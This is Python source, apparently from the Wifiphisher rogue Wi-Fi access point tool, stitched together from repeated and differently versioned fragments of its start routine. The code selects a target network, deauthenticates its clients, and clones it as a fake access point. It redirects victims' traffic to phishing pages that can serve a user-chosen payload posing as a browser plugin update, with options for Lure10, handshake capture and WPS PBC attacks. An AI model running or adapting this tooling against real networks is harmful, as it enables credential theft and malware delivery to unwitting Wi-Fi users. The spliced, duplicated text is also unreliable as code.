self.template_manager.template_directory + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) # only get logo path if MAC address is present ap_logo_path = False if target_ap_mac is not None: ap_logo_path = template.use_file( self.mac_matcher.get_vendor_logo_path(target_ap_mac)) template.merge_context({ 'target_ap_channel': channel or "", 'target_ap_essid': args.phishing_essid or essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # add wps_enable into the template context if args.wps_pbc: template.merge_context({'wps_pbc_attack': "1"}) else: template.merge_context({'wps_pbc_attack': "0"}) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --noextensions is enabled). self.network_manager.set_interface_mode(ap_iface, "managed") # Start AP self.network_manager.up_interface(ap_iface) self.access_point.interface = ap_iface self.access_point.channel = channel self.access_point.essid = essid if args.force_hostapd: print('[' + T + '*' + W + '] Using hostapd instead of roguehostapd.' " Many significant features will be turned off." ) self.access_point.force_hostapd = True if args.wpspbc_assoc_interface: wps_mac = self.network_manager.get_interface_mac( args.wpspbc_assoc_interface) self.access_point.deny_mac_addrs.append(wps_mac) if args.presharedkey: self.access_point.presharedkey = args.presharedkey if self.opmode.internet_sharing_enabled(): self.access_point.internet_interface = args.internetinterface print '[' + T + '*' + W + '] Starting the fake access point...' try: self.access_point.start(disable_karma=args.disable_karma) self.access_point.start_dhcp_dns() except BaseException: self.stop() # Start Extension Manager (EM) # We need to start EM before we boot the web server if self.opmode.extensions_enabled(): shared_data = { 'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(), 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_essid': essid or "", 'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface), 'roguehostapd': self.access_point.hostapd_object, 'APs': APs_context, 'args': args } self.network_manager.up_interface(mon_iface) self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) if args.handshake_capture: extensions.append(HANDSHAKE_VALIDATE_EXTENSION) if args.nodeauth: extensions.remove(DEAUTH_EXTENSION) if args.wps_pbc: extensions.append(WPSPBC) if args.known_beacons: extensions.append(KNOWN_BEACONS_EXTENSION) if not args.force_hostapd: extensions.append(ROGUEHOSTAPDINFO) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # With configured DHCP, we may now start the web server if not self.opmode.internet_sharing_enabled(): # Start HTTP server in a background thread print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str( PORT) + ", " + str(SSL_PORT) webserver = Thread( target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template, self.em)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher self.mac_matcher.unbind() clients_APs = [] APs = [] # Main loop. try: main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em, phishinghttp, args) tui_main_object = tui.TuiMain() curses.wrapper(tui_main_object.gather_info, main_info) self.stop() except KeyboardInterrupt: self.stop()
'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_essid': essid or "", 'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface), 'roguehostapd': self.access_point.hostapd_object, 'APs': APs_context, 'args': args } self.network_manager.up_interface(mon_iface) self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) if args.handshake_capture: extensions.append(HANDSHAKE_VALIDATE_EXTENSION) if args.nodeauth: extensions.remove(DEAUTH_EXTENSION) if args.wps_pbc: extensions.append(WPSPBC) if args.known_beacons: extensions.append(KNOWN_BEACONS_EXTENSION) if not args.force_hostapd: extensions.append(ROGUEHOSTAPDINFO) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # With configured DHCP, we may now start the web server if not self.opmode.internet_sharing_enabled():
def start(self): # Parse args global args, APs args = parse_args() # Check args check_args(args) # Are you root? if os.geteuid(): sys.exit('[' + R + '-' + W + '] Please run as root') if not args.internetinterface: kill_interfering_procs() self.network_manager.start() # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if args.internetinterface: if self.network_manager.is_interface_valid( args.internetinterface, "internet"): internet_interface = args.internetinterface self.network_manager.unblock_interface(internet_interface) if not args.nojamming: if args.jamminginterface and args.apinterface: if self.network_manager.is_interface_valid( args.jamminginterface, "monitor"): mon_iface = args.jamminginterface self.network_manager.unblock_interface(mon_iface) if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: mon_iface, ap_iface = self.network_manager.get_interface_automatically() # display selected interfaces to the user print ( "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format( G, W, mon_iface, ap_iface) # randomize the mac addresses if not args.no_mac_randomization: if args.mac_ap_interface: self.network_manager.set_interface_mac( ap_iface, args.mac_ap_interface) else: self.network_manager.set_interface_mac_random(ap_iface) if args.mac_deauth_interface: self.network_manager.set_interface_mac( mon_iface, args.mac_deauth_interface) else: self.network_manager.set_interface_mac_random( mon_iface) else: if args.apinterface: if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: ap_iface = self.network_manager.get_interface(True, False) mon_iface = ap_iface if not args.no_mac_randomization: if args.mac_ap_interface: self.network_manager.set_interface_mac( ap_iface, args.mac_ap_interface) else: self.network_manager.set_interface_mac_random(ap_iface) print ( "[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format( G, W, ap_iface) # randomize the mac addresses if not args.no_mac_randomization: self.network_manager.set_interface_mac_random(ap_iface) # make sure interfaces are not blocked self.network_manager.unblock_interface(ap_iface) self.network_manager.unblock_interface(mon_iface) self.network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.InvalidInterfaceError, interfaces.InterfaceCantBeFoundError, interfaces.InterfaceManagedByNetworkManagerError) as err: print ("[{0}!{1}] {2}").format(R, W, err) time.sleep(1) self.stop() if not args.no_mac_randomization: ap_mac = self.network_manager.get_interface_mac(ap_iface) print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(G, W, ap_iface, ap_mac) if not args.nojamming: mon_mac = self.network_manager.get_interface_mac(mon_iface) print ("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(G, W, mon_iface, mon_mac)) if args.internetinterface: self.fw.nat(ap_iface, args.internetinterface) set_ip_fwd() else: self.fw.redirect_requests_localhost() set_route_localnet() print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' time.sleep(1) if args.essid: essid = args.essid channel = str(CHANNEL) ap_mac = None enctype = None else: # let user choose access point ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher, self.network_manager, args) ap_sel_object = tui.TuiApSel() access_point = curses.wrapper(ap_sel_object.gather_info, ap_info_object) # if the user has chosen a access point continue # otherwise shutdown if access_point: # store choosen access point's information essid = access_point.get_name() channel = access_point.get_channel() ap_mac = access_point.get_mac_address() enctype = access_point.get_encryption() else: self.stop() # create a template manager object self.template_manager = phishingpage.TemplateManager() # get the correct template tui_template_obj = tui.TuiTemplateSelection() template = tui_template_obj.gather_info(args.phishingscenario, self.template_manager) print ("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = False # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = raw_input( "[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") if not os.path.isfile(payload_path): print '[' + R + '-' + W + '] Invalid file path!' print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) # only get logo path if MAC address is present ap_logo_path = False if ap_mac: ap_logo_path = template.use_file( self.mac_matcher.get_vendor_logo_path(ap_mac)) template.merge_context({ 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': self.mac_matcher.get_vendor_name(ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --nojamming is enabled). self.network_manager.set_interface_mode(ap_iface, "managed") # Start AP self.access_point.set_interface(ap_iface) self.access_point.set_channel(channel) self.access_point.set_essid(essid) if args.presharedkey: self.access_point.set_psk(args.presharedkey) if args.internetinterface: self.access_point.set_internet_interface(args.internetinterface) print '[' + T + '*' + W + '] Starting the fake access point...' try: self.access_point.start() self.access_point.start_dhcp_dns() except BaseException: self.stop() # With configured DHCP, we may now start the web server if not args.internetinterface: # Start HTTP server in a background thread print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(PORT) + ", " + str(SSL_PORT) webserver = Thread(target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher self.mac_matcher.unbind() clients_APs = [] APs = [] if not args.nojamming: # Start Extension Manager shared_data = { 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_mac': ap_mac, 'APs': APs_context, 'args': args } self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # Main loop. try: main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em, phishinghttp, args) tui_main_object = tui.TuiMain() curses.wrapper(tui_main_object.gather_info, main_info) except KeyboardInterrupt: self.stop()